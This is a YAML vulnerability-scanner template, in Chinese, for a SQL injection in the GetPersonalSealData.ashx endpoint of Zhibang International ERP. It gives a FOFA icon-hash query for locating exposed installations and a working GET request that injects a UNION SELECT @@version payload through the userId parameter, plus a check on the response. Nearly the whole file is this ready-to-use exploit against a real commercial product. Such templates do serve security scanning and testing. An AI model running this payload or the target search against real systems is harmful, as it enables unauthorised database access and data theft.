product: 智邦国际ERP
vName: 智邦国际ERP GetPersonalSealData.ashx存在sql注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 智邦国际以“一体化”为顶层设计理念，全面布局产品生态，满足不同行业、不同管理层次、不同信息化程度的企业需求。智邦国际ERP系统GetPersonalSealData.ashx接口处存在sql注入漏洞，攻击者可利用此漏洞获取数据库敏感信息。
version: ''
note: ''
search:
  FOFA: icon_hash="-682445886"
protocol: http
link: http://changge.online/blog-38.html
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /SYSN/json/pcclient/GetPersonalSealData.ashx?imageDate=1&userId=-1%20union%20select%20@@version--
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - '"SealData"'
            logic: and